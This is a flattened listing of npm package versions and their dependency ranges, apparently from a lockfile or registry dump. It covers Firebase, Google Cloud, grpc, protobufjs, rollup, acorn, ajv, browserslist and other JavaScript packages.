@firebase/messaging-types@0.5.0 node-fetch@2.6.1 tslib@^2.1.0 0.6.16 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/functions-types@0.4.0 @firebase/messaging-types@0.5.0 node-fetch@2.6.7 tslib@^2.1.0 0.10.0 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.0 @firebase/auth-interop-types@0.2.1 @firebase/component@0.6.4 @firebase/messaging-interop-types@0.2.0 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.11.8 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.2 @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/messaging-interop-types@0.2.2 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.12.9 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.3 @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/messaging-interop-types@0.2.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/functions-compat 0.3.5 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/functions@0.10.0 @firebase/functions-types@0.6.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.14 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/functions@0.11.8 @firebase/functions-types@0.6.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.26 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/functions@0.12.9 @firebase/functions-types@0.6.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/functions-types 0.4.0 0.6.0 0.6.2 0.6.3 @firebase/installations 0.4.32 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations-types@0.3.4 @firebase/util@1.3.0 idb@3.0.2 tslib@^2.1.0 0.6.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/util@1.9.3 idb@7.0.1 tslib@^2.1.0 0.6.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.6.18 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/installations-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/installations-types@0.5.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/installations-types@0.5.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.18 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/installations-types@0.5.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/installations-types 0.3.4 Scope peer|@firebase/app-types@0.x 0.5.0 Scope peer|@firebase/app-types@0.x 0.5.2 Scope peer|@firebase/app-types@0.x 0.5.3 Scope peer|@firebase/app-types@0.x @firebase/logger 0.2.6 0.4.0 tslib@^2.1.0 0.4.2 tslib@^2.1.0 0.4.4 tslib@^2.1.0 @firebase/messaging 0.8.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/messaging-types@0.5.0 @firebase/util@1.3.0 idb@3.0.2 tslib@^2.1.0 0.12.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/messaging-interop-types@0.2.0 @firebase/util@1.9.3 idb@7.0.1 tslib@^2.1.0 0.12.12 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/messaging-interop-types@0.2.2 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.12.22 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/messaging-interop-types@0.2.3 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/messaging-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/messaging@0.12.4 @firebase/util@1.9.3 tslib@^2.1.0 0.2.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/messaging@0.12.12 @firebase/util@1.10.0 tslib@^2.1.0 0.2.22 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/messaging@0.12.22 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/messaging-interop-types 0.2.0 0.2.2 0.2.3 @firebase/messaging-types 0.5.0 Scope peer|@firebase/app-types@0.x @firebase/performance 0.4.18 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/logger@0.2.6 @firebase/performance-types@0.0.13 @firebase/util@1.3.0 tslib@^2.1.0 0.6.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.6.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.7.7 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 web-vitals@^4.2.4 @firebase/performance-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/performance@0.6.4 @firebase/performance-types@0.2.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/performance@0.6.9 @firebase/performance-types@0.2.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.20 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/performance@0.7.7 @firebase/performance-types@0.2.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/performance-types 0.0.13 0.2.0 0.2.2 0.2.3 @firebase/polyfill 0.3.36 core-js@3.6.5 promise-polyfill@8.1.3 whatwg-fetch@2.0.4 @firebase/remote-config 0.1.43 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/logger@0.2.6 @firebase/remote-config-types@0.1.9 @firebase/util@1.3.0 tslib@^2.1.0 0.4.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.4.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.6.5 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/remote-config-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/remote-config@0.4.4 @firebase/remote-config-types@0.3.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/remote-config@0.4.9 @firebase/remote-config-types@0.3.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.18 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/remote-config@0.6.5 @firebase/remote-config-types@0.4.0 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/remote-config-types 0.1.9 0.3.0 0.3.2 0.4.0 @firebase/storage 0.7.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/storage-types@0.5.0 @firebase/util@1.3.0 node-fetch@2.6.1 tslib@^2.1.0 0.7.1 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/storage-types@0.5.0 @firebase/util@1.3.0 node-fetch@2.6.7 tslib@^2.1.0 0.11.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.13.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.13.14 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/storage-compat 0.3.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/storage@0.11.2 @firebase/storage-types@0.8.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/storage@0.13.2 @firebase/storage-types@0.8.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.24 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/storage@0.13.14 @firebase/storage-types@0.8.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/storage-types 0.5.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.2 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/util 1.3.0 tslib@^2.1.0 1.9.3 tslib@^2.1.0 1.10.0 tslib@^2.1.0 1.12.1 tslib@^2.1.0 @firebase/vertexai-preview 0.0.4 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.2 Scope peer|@firebase/app-types@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 @firebase/webchannel-wrapper 0.5.1 0.10.1 1.0.1 1.0.3 @google-cloud/cloudbuild 2.6.0 google-gax@^2.24.1 3.10.0 google-gax@^3.5.8 4.8.1 google-gax@^4.0.3 @google-cloud/common 3.8.0 @google-cloud/projectify@^2.0.0 @google-cloud/promisify@^2.0.0 arrify@^2.0.1 duplexify@^4.1.1 ent@^2.2.0 extend@^3.0.2 google-auth-library@^7.9.2 retry-request@^4.2.2 teeny-request@^7.0.0 3.10.0 @google-cloud/projectify@^2.0.0 @google-cloud/promisify@^2.0.0 arrify@^2.0.1 duplexify@^4.1.1 ent@^2.2.0 extend@^3.0.2 google-auth-library@^7.14.0 retry-request@^4.2.2 teeny-request@^7.0.0 @google-cloud/error-reporting 2.0.4 @google-cloud/common@^3.0.0 console-log-level@^1.4.1 2.0.5 @google-cloud/common@^3.0.0 console-log-level@^1.4.1 @google-cloud/projectify 2.1.1 @google-cloud/promisify 2.0.4 @grpc/grpc-js 1.4.0 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.1 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.2 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.3 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.4 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.5 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.4.6 @grpc/proto-loader@^0.6.4 @types/node@>=12.12.47 1.6.12 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.7.3 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.8.22 @grpc/proto-loader@^0.7.0 @types/node@>=12.12.47 1.9.15 @grpc/proto-loader@^0.7.8 @types/node@>=12.12.47 1.14.0 @grpc/proto-loader@^0.8.0 @js-sdsl/ordered-map@^4.4.2 @grpc/proto-loader 0.6.6 @types/long@^4.0.1 lodash.camelcase@^4.3.0 long@^4.0.0 protobufjs@^6.10.0 yargs@^16.1.1 0.6.13 @types/long@^4.0.1 lodash.camelcase@^4.3.0 long@^4.0.0 protobufjs@^6.11.3 yargs@^16.2.0 0.7.15 lodash.camelcase@^4.3.0 long@^5.0.0 protobufjs@^7.2.5 yargs@^17.7.2 0.8.0 lodash.camelcase@^4.3.0 long@^5.0.0 protobufjs@^7.5.3 yargs@^17.7.2 @isaacs/balanced-match 4.0.1 @isaacs/brace-expansion 5.0.0 @isaacs/balanced-match@^4.0.1 @isaacs/cliui 8.0.2 string-width@^5.1.2 KnownAs string-width-cjs|string-width@^4.2.0 strip-ansi@^7.0.1 KnownAs strip-ansi-cjs|strip-ansi@^6.0.1 wrap-ansi@^8.1.0 KnownAs wrap-ansi-cjs|wrap-ansi@^7.0.0 @jridgewell/gen-mapping 0.3.13 @jridgewell/sourcemap-codec@^1.5.0 @jridgewell/trace-mapping@^0.3.24 @jridgewell/remapping 2.3.5 @jridgewell/gen-mapping@^0.3.5 @jridgewell/trace-mapping@^0.3.24 @jridgewell/resolve-uri 3.1.2 @jridgewell/sourcemap-codec 1.5.5 @jridgewell/trace-mapping 0.3.31 @jridgewell/resolve-uri@^3.1.0 @jridgewell/sourcemap-codec@^1.4.14 @js-sdsl/ordered-map 4.4.2 @jsdoc/salty 0.2.9 lodash@^4.17.21 @parcel/watcher 2.5.1 Opt|@parcel/watcher-android-arm64@2.5.1 Opt|@parcel/watcher-darwin-arm64@2.5.1 Opt|@parcel/watcher-darwin-x64@2.5.1 Opt|@parcel/watcher-freebsd-x64@2.5.1 Opt|@parcel/watcher-linux-arm-glibc@2.5.1 Opt|@parcel/watcher-linux-arm-musl@2.5.1 Opt|@parcel/watcher-linux-arm64-glibc@2.5.1 Opt|@parcel/watcher-linux-arm64-musl@2.5.1 Opt|@parcel/watcher-linux-x64-glibc@2.5.1 Opt|@parcel/watcher-linux-x64-musl@2.5.1 Opt|@parcel/watcher-win32-arm64@2.5.1 Opt|@parcel/watcher-win32-ia32@2.5.1 Opt|@parcel/watcher-win32-x64@2.5.1 detect-libc@^1.0.3 is-glob@^4.0.3 micromatch@^4.0.5 node-addon-api@^7.0.0 @parcel/watcher-android-arm64 2.5.1 @parcel/watcher-darwin-arm64 2.5.1 @parcel/watcher-darwin-x64 2.5.1 @parcel/watcher-freebsd-x64 2.5.1 @parcel/watcher-linux-arm-glibc 2.5.1 @parcel/watcher-linux-arm-musl 2.5.1 @parcel/watcher-linux-arm64-glibc 2.5.1 @parcel/watcher-linux-arm64-musl 2.5.1 @parcel/watcher-linux-x64-glibc 2.5.1 @parcel/watcher-linux-x64-musl 2.5.1 @parcel/watcher-win32-arm64 2.5.1 @parcel/watcher-win32-ia32 2.5.1 @parcel/watcher-win32-x64 2.5.1 @polka/url 0.5.0 @protobufjs/aspromise 1.1.2 @protobufjs/base64 1.1.2 @protobufjs/codegen 2.0.4 @protobufjs/eventemitter 1.1.0 @protobufjs/fetch 1.1.0 @protobufjs/aspromise@^1.1.1 @protobufjs/inquire@^1.1.0 @protobufjs/float 1.0.2 @protobufjs/inquire 1.1.0 @protobufjs/path 1.1.2 @protobufjs/pool 1.1.0 @protobufjs/utf8 1.1.0 @rollup/plugin-commonjs 21.0.1 @rollup/pluginutils@^3.1.0 commondir@^1.0.1 estree-walker@^2.0.1 glob@^7.1.6 is-reference@^1.2.1 magic-string@^0.25.7 resolve@^1.17.0 Scope peer|rollup@^2.38.3 21.1.0 @rollup/pluginutils@^3.1.0 commondir@^1.0.1 estree-walker@^2.0.1 glob@^7.1.6 is-reference@^1.2.1 magic-string@^0.25.7 resolve@^1.17.0 Scope peer|rollup@^2.38.3 @rollup/plugin-node-resolve 13.0.6 @rollup/pluginutils@^3.1.0 @types/resolve@1.17.1 builtin-modules@^3.1.0 deepmerge@^4.2.2 is-module@^1.0.0 resolve@^1.19.0 Scope peer|rollup@^2.42.0 13.3.0 @rollup/pluginutils@^3.1.0 @types/resolve@1.17.1 deepmerge@^4.2.2 is-builtin-module@^3.1.0 is-module@^1.0.0 resolve@^1.19.0 Scope peer|rollup@^2.42.0 @rollup/pluginutils 3.1.0 @types/estree@0.0.39 estree-walker@^1.0.1 picomatch@^2.2.2 Scope peer|rollup@^1.20.0||^2.0.0 @tootallnate/once 2.0.0 @types/caseless 0.12.5 @types/estree 0.0.39 1.0.8 @types/glob 9.0.0 glob@* @types/linkify-it 5.0.0 @types/long 4.0.1 4.0.2 @types/markdown-it 14.1.2 @types/linkify-it@^5 @types/mdurl@^2 @types/mdurl 2.0.0 @types/node 12.6.9 16.11.6 24.10.0 undici-types@~7.16.0 @types/request 2.48.13 @types/caseless@* @types/node@* @types/tough-cookie@* form-data@^2.5.5 @types/resolve 1.17.1 @types/node@* @types/rimraf 3.0.2 @types/glob@* @types/node@* @types/tough-cookie 4.0.5 @ungap/promise-all-settled 1.1.2 @webcomponents/webcomponentsjs 2.4.0 2.8.0 abab 2.0.0 2.0.6 abort-controller 3.0.0 event-target-shim@^5.0.0 acorn 5.4.1 5.5.0 5.5.1 5.5.2 5.5.3 5.6.0 5.6.1 5.6.2 5.7.0 5.7.1 5.7.2 5.7.3 5.7.4 6.0.2 6.4.2 7.1.0 7.4.1 8.15.0 acorn-es7-plugin 1.1.7 acorn-globals 4.3.0 acorn@^6.0.1 acorn-walk@^6.0.1 4.3.4 acorn@^6.0.1 acorn-walk@^6.0.1 acorn-jsx 5.3.2 Scope peer|acorn@^6.0.0 || ^7.0.0 || ^8.0.0 acorn-walk 6.1.0 6.2.0 agent-base 4.3.0 es6-promisify@^5.0.0 6.0.2 debug@4 7.1.4 ajv 5.3.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.4.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.0 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.1 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 5.5.2 co@^4.6.0 fast-deep-equal@^1.0.0 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.3.0 6.12.6 fast-deep-equal@^3.1.1 fast-json-stable-stringify@^2.0.0 json-schema-traverse@^0.4.1 uri-js@^4.2.2 ansi-colors 3.2.3 4.1.1 4.1.3 ansi-gray 0.1.1 ansi-wrap@0.1.0 ansi-regex 2.1.1 3.0.0 3.0.1 4.1.1 5.0.1 6.2.2 ansi-styles 3.2.1 color-convert@^1.9.0 4.3.0 color-convert@^2.0.1 6.2.3 ansi-wrap 0.1.0 anymatch 3.0.3 normalize-path@^3.0.0 picomatch@^2.0.4 3.1.3 normalize-path@^3.0.0 picomatch@^2.0.4 arch 2.1.1 2.2.0 argparse 1.0.10 sprintf-js@~1.0.2 2.0.1 array-buffer-byte-length 1.0.2 call-bound@^1.0.3 is-array-buffer@^3.0.5 array-equal 1.0.0 1.0.2 array.prototype.reduce 1.0.8 call-bind@^1.0.8 call-bound@^1.0.4 define-properties@^1.2.1 es-abstract@^1.23.9 es-array-method-boxes-properly@^1.0.0 es-errors@^1.3.0 es-object-atoms@^1.1.1 is-string@^1.1.1 arraybuffer.prototype.slice 1.0.4 array-buffer-byte-length@^1.0.1 call-bind@^1.0.8 define-properties@^1.2.1 es-abstract@^1.23.5 es-errors@^1.3.0 get-intrinsic@^1.2.6 is-array-buffer@^3.0.4 arrify 2.0.1 asn1 0.2.4 safer-buffer@~2.1.0 0.2.6 safer-buffer@~2.1.0 assert-plus 1.0.0 assertion-error 1.1.0 async-function 1.0.0 async-generator-function 1.0.0 async-limiter 1.0.1 async-transforms 1.0.9 asynckit 0.4.0 autoprefixer 9.3.0 browserslist@^4.3.2 caniuse-lite@^1.0.30000898 normalize-range@^0.1.2 num2fraction@^1.2.2 postcss@^7.0.5 postcss-value-parser@^3.3.1 9.8.8 browserslist@^4.12.0 caniuse-lite@^1.0.30001109 normalize-range@^0.1.2 num2fraction@^1.2.2 picocolors@^0.2.1 postcss@^7.0.32 postcss-value-parser@^4.1.0 10.4.21 browserslist@^4.24.4 caniuse-lite@^1.0.30001702 fraction.js@^4.3.7 normalize-range@^0.1.2 picocolors@^1.1.1 Scope peer|postcss@^8.1.0 postcss-value-parser@^4.2.0 available-typed-arrays 1.0.7 possible-typed-array-names@^1.0.0 aws-sign2 0.7.0 aws4 1.8.0 1.13.2 babel-plugin-dynamic-import-node 2.3.0 object.assign@^4.1.0 babel-plugin-func-wrap 1.1.0 babel-plugin-polyfill-corejs2 0.4.14 @babel/compat-data@^7.27.7 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 semver@^6.3.1 babel-plugin-polyfill-corejs3 0.13.0 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 core-js-compat@^3.43.0 babel-plugin-polyfill-regenerator 0.6.5 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-define-polyfill-provider@^0.6.5 balanced-match 1.0.0 1.0.2 base64-js 1.5.1 baseline-browser-mapping 2.8.24 2.8.25 bcrypt-pbkdf 1.0.2 tweetnacl@^0.14.3 bignumber.js 9.0.1 9.3.1 binary-extensions 2.0.0 2.3.0 bluebird 3.7.2 brace-expansion 1.1.11 balanced-match@^1.0.0 concat-map@0.0.1 1.1.12 balanced-match@^1.0.0 concat-map@0.0.1 2.0.2 balanced-match@^1.0.0 braces 3.0.2 fill-range@^7.0.1 3.0.3 fill-range@^7.1.1 browser-process-hrtime 0.1.3 1.0.0 browser-stdout 1.3.1 browserslist 4.3.2 caniuse-lite@^1.0.30000898 electron-to-chromium@^1.3.80 node-releases@^1.0.0-alpha.14 4.3.3 caniuse-lite@^1.0.30000898 electron-to-chromium@^1.3.81 node-releases@^1.0.0-alpha.15 4.3.4 caniuse-lite@^1.0.30000899 electron-to-chromium@^1.3.82 node-releases@^1.0.1 4.3.5 caniuse-lite@^1.0.30000912 electron-to-chromium@^1.3.86 node-releases@^1.0.5 4.3.6 caniuse-lite@^1.0.30000921 electron-to-chromium@^1.3.92 node-releases@^1.1.1 4.3.7 caniuse-lite@^1.0.30000925 electron-to-chromium@^1.3.96 node-releases@^1.1.3 4.4.0 caniuse-lite@^1.0.30000928 electron-to-chromium@^1.3.100 node-releases@^1.1.3 4.4.1 caniuse-lite@^1.0.30000929 electron-to-chromium@^1.3.103 node-releases@^1.1.3 4.4.2 caniuse-lite@^1.0.30000939 electron-to-chromium@^1.3.113 node-releases@^1.1.8 4.5.0 caniuse-lite@^1.0.30000948 electron-to-chromium@^1.3.116 node-releases@^1.1.10 4.5.1 caniuse-lite@^1.0.30000949 electron-to-chromium@^1.3.116 node-releases@^1.1.11 4.5.2 caniuse-lite@^1.0.30000951 electron-to-chromium@^1.3.116 node-releases@^1.1.11 4.5.3 caniuse-lite@^1.0.30000955 electron-to-chromium@^1.3.122 node-releases@^1.1.12 4.5.4 caniuse-lite@^1.0.30000955 electron-to-chromium@^1.3.122 node-releases@^1.1.13 4.5.5 caniuse-lite@^1.0.30000960 electron-to-chromium@^1.3.124 node-releases@^1.1.14 4.5.6 caniuse-lite@^1.0.30000963 electron-to-chromium@^1.3.127 node-releases@^1.1.17 4.6.0 caniuse-lite@^1.0.30000967 electron-to-chromium@^1.3.133 node-releases@^1.1.19 4.6.1 caniuse-lite@^1.0.30000971 electron-to-chromium@^1.3.137 node-releases@^1.1.21 4.6.2 caniuse-lite@^1.0.30000974 electron-to-chromium@^1.3.150 node-releases@^1.1.23 4.6.3 caniuse-lite@^1.0.30000975 electron-to-chromium@^1.3.164 node-releases@^1.1.23 4.6.4 caniuse-lite@^1.0.30000981 electron-to-chromium@^1.3.188 node-releases@^1.1.25 4.6.5 caniuse-lite@^1.0.30000984 electron-to-chromium@^1.3.191 node-releases@^1.1.25 4.6.6 caniuse-lite@^1.0.30000984 electron-to-chromium@^1.3.191 node-releases@^1.1.25 4.7.0 caniuse-lite@^1.0.30000989 electron-to-chromium@^1.3.247 node-releases@^1.1.29 4.7.1 caniuse-lite@^1.0.30000999 electron-to-chromium@^1.3.284 node-releases@^1.1.36 4.7.2 caniuse-lite@^1.0.30001004 electron-to-chromium@^1.3.295 node-releases@^1.1.38 4.7.3 caniuse-lite@^1.0.30001010 electron-to-chromium@^1.3.306 node-releases@^1.1.40 4.8.0 caniuse-lite@^1.0.30001012 electron-to-chromium@^1.3.317 node-releases@^1.1.41 4.8.1 caniuse-lite@^1.0.30001015 electron-to-chromium@^1.3.322 node-releases@^1.1.42 4.8.2 caniuse-lite@^1.0.30001015 electron-to-chromium@^1.3.322 node-releases@^1.1.42 4.8.3 caniuse-lite@^1.0.30001017 electron-to-chromium@^1.3.322 node-releases@^1.1.44 4.8.4 caniuse-lite@^1.0.30001021 electron-to-chromium@^1.3.338 node-releases@^1.1.46 4.8.5 caniuse-lite@^1.0.30001022 electron-to-chromium@^1.3.338 node-releases@^1.1.46 4.8.6 caniuse-lite@^1.0.30001023 electron-to-chromium@^1.3.341 node-releases@^1.1.47 4.8.7 caniuse-lite@^1.0.30001027 electron-to-chromium@^1.3.349 node-releases@^1.1.49 4.9.0 caniuse-lite@^1.0.30001030 electron-to-chromium@^1.3.361 node-releases@^1.1.50 4.9.1 caniuse-lite@^1.0.30001030 electron-to-chromium@^1.3.363 node-releases@^1.1.50 4.10.0 caniuse-lite@^1.0.30001035 electron-to-chromium@^1.3.378 node-releases@^1.1.52 pkg-up@^3.1.0 4.11.0 caniuse-lite@^1.0.30001035 electron-to-chromium@^1.3.380 node-releases@^1.1.52 pkg-up@^3.1.0 4.11.1 caniuse-lite@^1.0.30001038 electron-to-chromium@^1.3.390 node-releases@^1.1.53 pkg-up@^2.0.0 4.12.0 caniuse-lite@^1.0.30001043 electron-to-chromium@^1.3.413 node-releases@^1.1.53 pkg-up@^2.0.0 4.12.1 caniuse-lite@^1.0.30001088 electron-to-chromium@^1.3.481 escalade@^3.0.1 node-releases@^1.1.58 4.12.2 caniuse-lite@^1.0.30001088 electron-to-chromium@^1.3.483 escalade@^3.0.1 node-releases@^1.1.58 4.13.0 caniuse-lite@^1.0.30001093 electron-to-chromium@^1.3.488 escalade@^3.0.1 node-releases@^1.1.58 4.14.0 caniuse-lite@^1.0.30001111 electron-to-chromium@^1.3.523 escalade@^3.0.2 node-releases@^1.1.60 4.14.1 caniuse-lite@^1.0.30001124 electron-to-chromium@^1.3.562 escalade@^3.0.2 node-releases@^1.1.60 4.14.2 caniuse-lite@^1.0.30001125 electron-to-chromium@^1.3.564 escalade@^3.0.2 node-releases@^1.1.61 4.14.3 caniuse-lite@^1.0.30001131 electron-to-chromium@^1.3.570 escalade@^3.1.0 node-releases@^1.1.61 4.14.4 caniuse-lite@^1.0.30001135 electron-to-chromium@^1.3.570 escalade@^3.1.0 node-releases@^1.1.61 4.14.5 caniuse-lite@^1.0.30001135 electron-to-chromium@^1.3.571 escalade@^3.1.0 node-releases@^1.1.61 4.14.6 caniuse-lite@^1.0.30001154 electron-to-chromium@^1.3.585 escalade@^3.1.1 node-releases@^1.1.65 4.14.7 caniuse-lite@^1.0.30001157 colorette@^1.2.1 electron-to-chromium@^1.3.591 escalade@^3.1.1 node-releases@^1.1.66 4.15.0 caniuse-lite@^1.0.30001164 colorette@^1.2.1 electron-to-chromium@^1.3.612 escalade@^3.1.1 node-releases@^1.1.67 4.16.0 caniuse-lite@^1.0.30001165 colorette@^1.2.1 electron-to-chromium@^1.3.621 escalade@^3.1.1 node-releases@^1.1.67 4.16.1 caniuse-lite@^1.0.30001173 colorette@^1.2.1 electron-to-chromium@^1.3.634 escalade@^3.1.1 node-releases@^1.1.69 4.16.2 caniuse-lite@^1.0.30001181 colorette@^1.2.1 electron-to-chromium@^1.3.649 escalade@^3.1.1 node-releases@^1.1.70 4.16.3 caniuse-lite@^1.0.30001181 colorette@^1.2.1 electron-to-chromium@^1.3.649 escalade@^3.1.1 node-releases@^1.1.70 4.16.4 caniuse-lite@^1.0.30001208 colorette@^1.2.2 electron-to-chromium@^1.3.712 escalade@^3.1.1 node-releases@^1.1.71 4.16.5 caniuse-lite@^1.0.30001214 colorette@^1.2.2 electron-to-chromium@^1.3.719 escalade@^3.1.1 node-releases@^1.1.71 4.16.6 caniuse-lite@^1.0.30001219 colorette@^1.2.2 electron-to-chromium@^1.3.723 escalade@^3.1.1 node-releases@^1.1.71 4.16.7 caniuse-lite@^1.0.30001248 colorette@^1.2.2 electron-to-chromium@^1.3.793 escalade@^3.1.1 node-releases@^1.1.73 4.16.8 caniuse-lite@^1.0.30001251 colorette@^1.3.0 electron-to-chromium@^1.3.811 escalade@^3.1.1 node-releases@^1.1.75 4.17.0 caniuse-lite@^1.0.30001254 colorette@^1.3.0 electron-to-chromium@^1.3.830 escalade@^3.1.1 node-releases@^1.1.75 4.17.1 caniuse-lite@^1.0.30001259 electron-to-chromium@^1.3.846 escalade@^3.1.1 nanocolors@^0.1.5 node-releases@^1.1.76 4.17.2 caniuse-lite@^1.0.30001261 electron-to-chromium@^1.3.854 escalade@^3.1.1 nanocolors@^0.2.12 node-releases@^1.1.76 4.17.3 caniuse-lite@^1.0.30001264 electron-to-chromium@^1.3.857 escalade@^3.1.1 node-releases@^1.1.77 picocolors@^0.2.1 4.17.4 caniuse-lite@^1.0.30001265 electron-to-chromium@^1.3.867 escalade@^3.1.1 node-releases@^2.0.0 picocolors@^1.0.0 4.17.5 caniuse-lite@^1.0.30001271 electron-to-chromium@^1.3.878 escalade@^3.1.1 node-releases@^2.0.1 